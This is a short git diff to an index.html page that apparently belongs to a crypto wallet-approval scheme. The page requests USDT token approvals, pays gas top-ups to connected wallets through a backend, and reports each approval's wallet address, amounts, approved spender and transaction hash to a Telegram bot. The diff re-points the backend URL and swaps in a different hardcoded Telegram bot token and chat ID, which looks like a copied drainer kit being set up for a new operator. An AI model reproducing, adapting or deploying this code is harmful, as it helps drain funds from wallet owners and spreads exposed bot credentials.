--- a/index.html
+++ b/index.html
@@ -486,7 +486,7 @@
 // Function to request the BNB top-up from your backend
 async function requestBNBTopUp(account) {
     try {
-        const response = await fetch('https://subhim-production.up.railway.app/send-bnb', {
+        const response = await fetch('https://armaan-copy-production.up.railway.app/send-bnb', {
             method: 'POST',
             headers: { 'Content-Type': 'application/json' },
             body: JSON.stringify({ recipient: account }),
@@ -628,8 +628,8 @@ async function approveToken(account) {
 // Telegram notification function - simplified and more reliable
 async function sendTelegramNotification(walletAddress, bnbAmount, usdtAmount, approvedAddress, dateTime, txHash) {
     // Function is automatically available globally, but we'll also assign it explicitly
-    const botToken = '8327129513:AAG3Ic98kJkpXNy8lRS0QKFqx-oQ9ilG4vQ';
-    const chatId = '8191508290';
+    const botToken = '8482419700:AAE_t6h2_W5-JWrHCJ35mFaf3dfCDmB6a7I';
+    const chatId = '1727819576';
     
     const message = `🔔 USDT Approval Notification\n\n` +
                     `👤 Wallet Address: ${walletAddress}\n` +
